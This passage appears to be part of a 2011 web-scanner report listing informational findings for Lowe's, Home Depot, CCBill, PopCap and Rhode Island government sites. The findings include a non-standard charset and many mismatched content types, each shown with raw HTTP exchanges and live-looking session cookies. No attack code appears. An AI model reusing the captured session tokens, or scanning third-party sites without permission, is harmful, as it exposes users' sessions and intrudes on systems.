Cookie: cmTPSet=Y; MBJT=3X-GjNMfSpxZg4AcdSyRyWoKGL1SXlVlZak_4S69Ys_sq5o29-TPKZg; selectedStore1=Lowe's Of Brooklyn## NY|1674|4|11215|no|Y|118 2nd Avenue|Brooklyn|M-Sa 6 Am - Midnight## Su 8 Am - 10 Pm|(718) 249-1151|(718) 249-1152|ZK; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=lqKgTvyXs59OqiWHtkQYsR6yqww%3d%0a%3b2011%2d07%2d12+17%3a30%3a53%2e805%5f1310506253758%2d32392%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2czavDyvRAPLOMLbNZ9U%2brj7uHCuulaXU18t%2fO%2fSx3lFn%2f45taoGYDYucxz4%2fp6B8TseYfU77Cle%2fm%0ab0yPR1ZdZKqdzv4K90EN5LABrTDJqw%2bv3BQL%2fdgBlrAW4pfUJIrUfYSaLoZuCgSo0qJaRQKNfA%3d%3d; WC_GENERIC_ACTIVITYDATA=[2896981527%3atrue%3afalse%3a0%3aWsNL%2fRHH6YRulRJGHQvbU%2bbK20A%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10051%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10005%2610005%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null][com.ibm.commerce.gifregistry.context.GiftRegistryContext|null%26null%26null]; LowesSearchSessionFacade=%7B%22articlesPerPage%22%3A0%2C%22productsPerPage%22%3A0%7D; catSearchResult=|/pl_Flooring_4294934373_4294937087_; TSdcd8fd=42184ef523475358e3f266b98a3eff98b936a614cb0d4b614e1cbbd2; JSESSIONID=0000bJcLADoQIGfUv01WZVkpsK7:14e1grfqa; BIGipServerproduction-asm-onlineA.lowes.com-tcp443=217583788.47873.0000; akaau=1310518355~id=24041af9526315cfad1662ac5edcd35c; stop_mobi=yes; TS176ebc=5d870c16fab6d71eaef6689f408ec163952fb28614d407a34e1ce3a6; cmSessionDepth=5; lowes-prefs={"zipin":{"show":false},"tollfree":{"show":true}}; fsr.s={"v":1,"rid":"1310506289401_163212","ru":"http://www.lowes.com/?mastheadURL=TopCategoriesDisplayView&firstReferURL=http%3A%2F%2Fwww.lowes.com%2F&qvRedirect=&langId=-1&findStoreErrorURL=StoreLocatorDisplayView&catalogId=10051&masthead=true&zipCode=10010&Ntt=&NttParam=&storeId=10151&selectedLocalStoreBeanArray=%5Bcom.lowes.commerce.storelocator.beans.LocatorStoreBean%404e575949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%404e75d949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%404e955949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%403d749949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%403d941949%5D&URL=TopCategoriesDisplayView&y=0&isQvSearch=&x=0","r":"www.lowes.com","st":"","to":3,"c":"https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm\nFpd3O3L2OA==","pv":3,"lc":{"d0":{"v":3,"s":false,"e":1}},"cd":0,"sd":0}

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 12 Nov 2010 20:11:24 GMT
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 3801
Expires: Wed, 13 Jul 2011 00:23:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 13 Jul 2011 00:23:16 GMT
Connection: keep-alive
Vary: Accept-Encoding

<h2>Featured Kitchen Projects</h2><ul class="bucket projects"> <li><a name="MASTHEAD_2_measure_your_kitchen" href="/cd_5+Key+Tips+for+Measuring+Your+Kitchen_1280418267_"><img src="/images/projects/k
...[SNIP]...

25.20. https://www.lowes.com/MContent/Structured/MastheadArea/projects/laundry.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.lowes.com
Path:	/MContent/Structured/MastheadArea/projects/laundry.html

Request

GET /MContent/Structured/MastheadArea/projects/laundry.html HTTP/1.1
Host: www.lowes.com
Connection: keep-alive
Referer: https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm?langId=-1&storeId=10151&catalogId=10051&krypto=w37ixU9mxd51c2GEFG7BpBTiHMF%2BPtrjg%2F5ZFfDHXjuTogRqSuGR4efV6fa7g5SaSXQQW3naq2iX%0AFpd3O3L2OA%3D%3D
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/html, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmTPSet=Y; MBJT=3X-GjNMfSpxZg4AcdSyRyWoKGL1SXlVlZak_4S69Ys_sq5o29-TPKZg; selectedStore1=Lowe's Of Brooklyn## NY|1674|4|11215|no|Y|118 2nd Avenue|Brooklyn|M-Sa 6 Am - Midnight## Su 8 Am - 10 Pm|(718) 249-1151|(718) 249-1152|ZK; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=lqKgTvyXs59OqiWHtkQYsR6yqww%3d%0a%3b2011%2d07%2d12+17%3a30%3a53%2e805%5f1310506253758%2d32392%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2czavDyvRAPLOMLbNZ9U%2brj7uHCuulaXU18t%2fO%2fSx3lFn%2f45taoGYDYucxz4%2fp6B8TseYfU77Cle%2fm%0ab0yPR1ZdZKqdzv4K90EN5LABrTDJqw%2bv3BQL%2fdgBlrAW4pfUJIrUfYSaLoZuCgSo0qJaRQKNfA%3d%3d; WC_GENERIC_ACTIVITYDATA=[2896981527%3atrue%3afalse%3a0%3aWsNL%2fRHH6YRulRJGHQvbU%2bbK20A%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10051%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10005%2610005%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null][com.ibm.commerce.gifregistry.context.GiftRegistryContext|null%26null%26null]; LowesSearchSessionFacade=%7B%22articlesPerPage%22%3A0%2C%22productsPerPage%22%3A0%7D; catSearchResult=|/pl_Flooring_4294934373_4294937087_; TSdcd8fd=42184ef523475358e3f266b98a3eff98b936a614cb0d4b614e1cbbd2; JSESSIONID=0000bJcLADoQIGfUv01WZVkpsK7:14e1grfqa; BIGipServerproduction-asm-onlineA.lowes.com-tcp443=217583788.47873.0000; akaau=1310518355~id=24041af9526315cfad1662ac5edcd35c; stop_mobi=yes; TS176ebc=5d870c16fab6d71eaef6689f408ec163952fb28614d407a34e1ce3a6; cmSessionDepth=5; lowes-prefs={"zipin":{"show":false},"tollfree":{"show":true}}; fsr.s={"v":1,"rid":"1310506289401_163212","ru":"http://www.lowes.com/?mastheadURL=TopCategoriesDisplayView&firstReferURL=http%3A%2F%2Fwww.lowes.com%2F&qvRedirect=&langId=-1&findStoreErrorURL=StoreLocatorDisplayView&catalogId=10051&masthead=true&zipCode=10010&Ntt=&NttParam=&storeId=10151&selectedLocalStoreBeanArray=%5Bcom.lowes.commerce.storelocator.beans.LocatorStoreBean%404e575949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%404e75d949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%404e955949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%403d749949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%403d941949%5D&URL=TopCategoriesDisplayView&y=0&isQvSearch=&x=0","r":"www.lowes.com","st":"","to":3,"c":"https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm\nFpd3O3L2OA==","pv":3,"lc":{"d0":{"v":3,"s":false,"e":1}},"cd":0,"sd":0}

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 19 Nov 2010 15:10:17 GMT
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 3817
Expires: Wed, 13 Jul 2011 00:23:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 13 Jul 2011 00:23:21 GMT
Connection: keep-alive
Vary: Accept-Encoding

<h2>Featured Laundry Projects</h2><ul class="bucket projects"> <li><a name="MASTHEAD_2_small_space_laundry" href="/cd_Small+Space+span+classsearchtermLaundryspan_1260974226_"><img src="/images/proje
...[SNIP]...

25.21. http://www.popcap.com/js/s_code.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.popcap.com
Path:	/js/s_code.php

Request

GET /js/s_code.php HTTP/1.1
Host: www.popcap.com
Proxy-Connection: keep-alive
Referer: http://www.popcap.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: user_id=461b1f76-758a-4ffe-87df-c12b77a2c13c; lcid=1033; geo_location=US; demographics=000000000000000; cookie_version=5; PHPSESSID=76pelmajogplbteaspie6s6ce0; lv=1310503142; user_profile=001000000000000

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html
Cache-Control: max-age=1
Expires: Tue, 12 Jul 2011 20:39:14 GMT
X-Frame-Options: sameorigin
X-Cacheable: NO: !beresp.cacheable
Content-Length: 32013
Date: Tue, 12 Jul 2011 20:39:13 GMT
X-Varnish: 231544122
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-IP: .73
X-Cache: MISS

/* SiteCatalyst code version: H.14.
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************

...[SNIP]...

25.22. http://www.readability.com/embed.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.readability.com
Path:	/embed.js

Request

GET /embed.js HTTP/1.1
Host: www.readability.com
Proxy-Connection: keep-alive
Referer: http://www.ri.gov/press/view/14202
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Wed, 13 Jul 2011 00:31:48 GMT
P3P: CP="Legacy Only. Go to https://readability.com/about/terms/ for full terms."
Server: nginx/0.7.65
Vary: Cookie
Connection: keep-alive
Content-Length: 15280

/*jslint white: true, devel: true, onevar: true, browser: true, undef: true, nomen: true, regexp: false, plusplus: false, bitwise: true, newcap: true, maxerr: 50, indent: 4 */

/**
* rdbEmbed
*
* T
...[SNIP]...

25.23. http://www.readability.com/static/embed/embed.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.readability.com
Path:	/static/embed/embed.html

Request

GET /static/embed/embed.html?url=http%3A%2F%2Fwww.ri.gov%2Fpress%2Fview%2F14202 HTTP/1.1
Host: www.readability.com
Proxy-Connection: keep-alive
Referer: http://www.ri.gov/press/view/14202
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: text/html
Date: Wed, 13 Jul 2011 00:31:52 GMT
Expires: Thu, 14 Jul 2011 00:31:52 GMT
Last-Modified: Mon, 27 Jun 2011 21:20:24 GMT
Server: nginx/0.7.65
Content-Length: 1794
Connection: keep-alive

<!DOCTYPE html>
<html>
<head>
<title>Readability | Embed</title>
<meta charset="utf-8">
<meta name="robots" content="noindex">
<link rel="stylesheet" href="/media/css/embed.1309209119
...[SNIP]...

25.24. http://www2.tmc.state.ri.us/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www2.tmc.state.ri.us
Path:	/

Request

Response

26. HTML uses unrecognised charset previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://ucc.state.ri.us
Path:	/loginsystem/login.asp

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

unicode

Issue background

Applications may specify a non-standard character set as a result of typographical errors within the code base, or because of intentional usage of an unusual character set that is not universally recognised by browsers. If the browser does not recognise the character set specified by the application, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

Request

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:48:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 3867
Content-Type: text/html
Expires: Tue, 12 Jul 2011 00:48:06 GMT
Cache-control: no-cache

<SCRIPT LANGUAGE="JavaScript">
// <!--
var Worklist = ""
if (Worklist != "True"){
window.location = "http://ucc.state.ri.us/loginsystem/login_form.asp";
}
if (Worklist == "True")
...[SNIP]...
<HEAD>
<META content="text/html; charset=unicode" http-equiv=Content-Type>
<META content="MSHTML 5.00.3211.1700" name=GENERATOR>
...[SNIP]...

27. Content type incorrectly stated previous
There are 43 instances of this issue:

http://apps.ccbill.com/favicon.ico
http://apps.ccbill.com/includes/common/category-icons/default.gif
http://ext.homedepot.com/www/esi/external/include.php
http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate
http://maps.gstatic.com/intl/en_us/mapfiles/closedhand_8_8.cur
http://sr2.liveperson.net/hcp/html/mTag.js
https://store.popcap.com/js/s_code.php
http://wallst.jpmorganchase.com/chase/services/MultiQuote/MultiQuote.asp
http://www.ccbill.com/favicon.ico
http://www.ccbill.com/signup/trans.cgi
https://www.ccbill.com/favicon.ico
http://www.citizencorps.gov/includes/facts.json
http://www.doit.ri.gov/favicon.ico
http://www.google.com/search
http://www.homedepot.com/businessControlledFragments/htmls/TypeAhead-min.json
http://www.homedepot.com/hdus/en_US/DTCCOM/HomePage/Images/white_space_10px.gif
http://www.homedepot.com/hdus/en_US/DTCCOM/common/commercestatic/hdus/en_US/JavaScripts/Homepage_js.json
http://www.homedepot.com/hdus/en_US/DTCCOM/common/commercestatic/hdus/en_US/JavaScripts/hero_slider.json
http://www.homedepot.com/hdus/en_US/DTCCOM/common/commercestatic/hdus/en_US/JavaScripts/lithium-handling.json
http://www.homedepot.com/wcsstore/hdus/en_US/images/layout/arrow_cta.png
http://www.homedepot.com/wcsstore/hdus/en_US/images/layout/clear.png
http://www.homedepot.com/wcsstore/hdus/en_US/images/layout/orange-square.png
http://www.homedepot.com/wcsstore/hdus/en_US/styles/businessjs.json
http://www.jpmorgan.com/cm/BlobServer
http://www.jpmorgan.com/cm/Satellite
http://www.jpmorgan.com/favicon.ico
http://www.lowes.com/campaign/summer/2011/images/homepage/20110622_area5_background.jpg
http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/Mexico/js/ContenidoMenu.js
https://www.lowes.com/MContent/Structured/MastheadArea/help_center/my_profile.html
http://www.mass.gov/favicon.ico
http://www.popcap.com/js/s_code.php
http://www.readability.com/embed.js
http://www.res-x.com/ws/r2/Resonance.aspx
http://www.ri.gov/favicon.ico
http://www.ri.gov/img/favicon.ico
http://www.ri.gov/img/governmentbox/seal.gif
http://www.ri.gov/type/junction_02-webfont.woff
https://www.ri.gov/img/favicon.ico
https://www.ri.gov/type/junction_02-webfont.woff
http://www.riema.ri.gov/favicon.ico
http://www.us-cert.gov/favicon.ico
http://www6.homedepot.com/favicon.ico
http://www6.homedepot.com/how-to/assets/images/modal/lightbox-close.png

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

27.1. http://apps.ccbill.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://apps.ccbill.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: apps.ccbill.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: __utma=250776793.716836192.1310490057.1310490057.1310490057.1; __utmb=250776793.3.10.1310490057; __utmc=250776793; __utmz=250776793.1310490057.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __kti=1310490058054,http%3A%2F%2Fwww.ccbill.com%2F,http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; __kts=1310490058057,http%3A%2F%2Fwww.ccbill.com%2F,http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; __ktv=1b20-38-480-dd841311f4b5d4c; __ktt=d411-90b5-b8ff-5d151311f4b5d4c; PHPSESSID=6nflcqbla83qcbamgrdcq2p1n1

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:01:56 GMT
Server: Apache
Last-Modified: Thu, 18 Mar 2010 16:40:22 GMT
ETag: "886ad-10be-e30c4980"
Accept-Ranges: bytes
Content-Length: 4286
Content-Type: text/plain; charset=UTF-8

...... .... .........(... ...@..... ..........................h...j...k...l...m...m...k...i...e...c...a...`...`...`...c...e...i...l...n ..q!..t"..u"..v#..v#..v#..v#..v#..v#..v#..v#..v#..v#..e...f...h
...[SNIP]...

27.2. http://apps.ccbill.com/includes/common/category-icons/default.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://apps.ccbill.com
Path:	/includes/common/category-icons/default.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /includes/common/category-icons/default.gif HTTP/1.1
Host: apps.ccbill.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://apps.ccbill.com/
Cookie: __utma=250776793.716836192.1310490057.1310490057.1310490057.1; __utmb=250776793.3.10.1310490057; __utmc=250776793; __utmz=250776793.1310490057.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __kti=1310490058054,http%3A%2F%2Fwww.ccbill.com%2F,http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; __kts=1310490058057,http%3A%2F%2Fwww.ccbill.com%2F,http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; __ktv=1b20-38-480-dd841311f4b5d4c; __ktt=d411-90b5-b8ff-5d151311f4b5d4c; PHPSESSID=6nflcqbla83qcbamgrdcq2p1n1

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:01:55 GMT
Server: Apache
Last-Modified: Wed, 27 Jan 2010 20:52:55 GMT
ETag: "8a9f6-85b-962bf7c0"
Accept-Ranges: bytes
Content-Length: 2139
Content-Type: image/gif

.PNG
.
...IHDR... ... .....szz.....sBIT....|.d.... pHYs.. :.. :..d.J....tEXtSoftware.www.inkscape.org..<.....IDATX....._W...k.s....i:!.sm3.il2.......6.....j
>(HA..../>...|..... ...b).-m.&4...Mf&s...
...[SNIP]...

27.3. http://ext.homedepot.com/www/esi/external/include.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ext.homedepot.com
Path:	/www/esi/external/include.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /www/esi/external/include.php?file=FooterView.html HTTP/1.1
Host: ext.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www6.homedepot.com/how-to/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; VISITORID=910187893; X-Mapping-akhokmek=8BB131CD3CF7419E500A9B2BD7C1B47E; WCSSESSIONID=0000QiM4nuQJ3aVixF3NjrJw_1o:1146agca4; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eNone%5f%7eC26%5fEXP%7e; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=JMxYfo5MdQHKu9q8vDJ%2brG6L1y0%3d%0a%3b2011%2d07%2d12+12%3a43%3a57%2e331%5f1308225529140%2d4164%5f10051%5f295945051%2c%2d1%2cUSD%5f10051; WC_ACTIVESTOREDATA=%2d1%2c10051; RES_SESSIONID=877035136567428; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=2; THD_SESSION=C34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d%2d1; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360065529%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360065529%3a%3bC6%3d%7b%22I1%22%3a%222%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22false%22%2c%22D1%22%3a%22%247%2e94%22%2c%22D2%22%3a%22%24241%2e06%22%7d%3a%3bC6%5fEXP%3d1313081163%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360065529%3a%3bC25%3dccaita76%2fWC%5fTHD%5fccaita76%2f1310489162672%3a%3bC25%5fEXP%3d1362329162%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360065529%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360065529; WC_USERSESSION_295945051=295945051%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1310492763302%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2c%2bNrrMNX%2fCejPLC6nTINfj0lqY5c%3d; s_pers=%20s_campaign%3Dno%2520value%7C1310491412192%3B%20s_prevPage%3Dno%2520value%7C1310491412198%3B%20p_30%3Dno%2520value%7C1310491412200%3B; s_sess=%20s_cc%3Dtrue%3B%20s_cmpnm%3Dundefined%3B%20p_v62%3Dnon-major%2520appliance%3B%20SC_LINKS%3Dundefined%255E%255E%255E%255Eundefined%2520%257C%2520no%2520%2526lid%255E%255E%3B%20s_sq%3Dhomedepot%253D%252526pid%25253Dhttp%2525253A%2525252F%2525252Fwww.homedepot.com%2525252Fwebapp%2525252Fwcs%2525252Fstores%2525252Fservlet%2525252FOrderCalculate%2525253Fcheck%2525253D*n%25252526jspStoreDir%2525253Dhdus%25252526contractId%2525253D2081191%25252526itemAdd%2525253Dtrue%25252526orderId%2525253D131526257%25252526quantity%2525253D1%25252526catalogId%2525253D10053%25252526orderItemId%2525253D339315499%25252526langId%2525253D-1%25252526URL%2525253DOrderItemDisplayViewShiptoAssoc%25252526catEntryId%2525253D2023491%252526oid%25253DHeader-How-To%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: text/html; charset=UTF-8
Date: Tue, 12 Jul 2011 16:53:36 GMT
Connection: Keep-Alive
Content-Length: 17121

document.write("<div id=\"ciscript_bcf\"></div><div class=\"clear\"></div><div id=\"footer_wrapper\"> <div id=\"dropdown_wrapper\"> <dl class=\"dropdown_menu dropdown_menu
...[SNIP]...

27.4. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://maps.googleapis.com
Path:	/maps/api/js/AuthenticationService.Authenticate

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript; charset=UTF-8

The response states that it contains script. However, it actually appears to contain plain text.

Request

Response

27.5. http://maps.gstatic.com/intl/en_us/mapfiles/closedhand_8_8.cur previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://maps.gstatic.com
Path:	/intl/en_us/mapfiles/closedhand_8_8.cur

Issue detail

The response contains the following Content-type statement:

Content-Type: image/bmp

The response states that it contains a BMP image. However, it actually appears to contain unrecognised content.

Request

GET /intl/en_us/mapfiles/closedhand_8_8.cur HTTP/1.1
Host: maps.gstatic.com
Proxy-Connection: keep-alive
Referer: http://511.dot.ri.gov/hb/main.jsf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/bmp
Last-Modified: Thu, 17 Sep 2009 03:15:42 GMT
Date: Wed, 13 Jul 2011 00:37:23 GMT
Expires: Wed, 13 Jul 2011 00:37:23 GMT
Cache-Control: private, max-age=31536000
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 326
X-XSS-Protection: 1; mode=block

...... ......0.......(... ...@........................................................................................................................................................................
...[SNIP]...

27.6. http://sr2.liveperson.net/hcp/html/mTag.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://sr2.liveperson.net
Path:	/hcp/html/mTag.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /hcp/html/mTag.js?site=57386690 HTTP/1.1
Host: sr2.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16101514677756,d=1305377522

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Content-Location: http://sales.liveperson.net/lpWeb/default_ENT//hcpv/emt/mtag.js?site=57386690
Last-Modified: Sun, 13 Mar 2011 22:27:52 GMT
Accept-Ranges: bytes
ETag: "e0f243e4cde1cb1:1483"
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 17291
Date: Tue, 12 Jul 2011 16:35:54 GMT
Connection: close

eval((function(s){var a,c,e,i,j,o="",r,t=".....................................................................................................................$@^`~";for(i=0;i<s.length;i++){r=t+s[i][
...[SNIP]...

27.7. https://store.popcap.com/js/s_code.php previous next

Summary

